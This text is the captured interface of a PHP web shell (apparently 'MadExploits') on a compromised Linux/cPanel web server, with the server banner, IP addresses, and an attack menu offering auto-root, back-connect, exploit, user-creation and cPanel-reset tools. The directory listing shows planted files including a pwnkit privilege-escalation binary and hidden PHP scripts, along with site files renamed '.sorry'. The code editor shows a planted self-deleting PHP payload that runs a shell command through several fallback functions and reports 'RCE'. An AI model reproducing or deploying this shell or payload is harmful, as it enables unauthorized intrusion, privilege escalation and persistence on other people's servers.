Linux server.flyproject.com.br 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
Apache
: 207.244.227.86 | : 216.73.217.1
10 Domain
7.1.33
hubnog
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
hubnog /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
bin-cache-365ee6
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
.h46218.php
654
B
-rw-r--r--
.health-check.php
1.06
KB
-rw-r--r--
.htaccess
257
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.r43062.php
74
B
-rw-r--r--
README.md
404
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
ajax.php.sorry
2.7
KB
-rw-r--r--
gecko.php
62.77
KB
-r--r--r--
index.php.sorry
2.35
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .h46218.php
<?php $c=base64_decode('aWQ=');$o=''; if(function_exists('popen')){$h=popen($c.' 2>&1','r');if($h){$o=stream_get_contents($h);pclose($h);}} elseif(function_exists('proc_open')){$d=[1=>['pipe','w'],2=>['pipe','w']];$p=proc_open($c,$d,$pp);if(is_resource($p)){$o=stream_get_contents($pp[1]);proc_close($p);}} elseif(function_exists('exec')){exec($c.' 2>&1',$a);$o=implode("\n",$a);} elseif(function_exists('system')){ob_start();system($c.' 2>&1');$o=ob_get_clean();} elseif(function_exists('shell_exec')){$o=shell_exec($c.' 2>&1');} elseif(function_exists('passthru')){ob_start();passthru($c.' 2>&1');$o=ob_get_clean();} echo "RCE:".$o;@unlink(__FILE__);?>
Close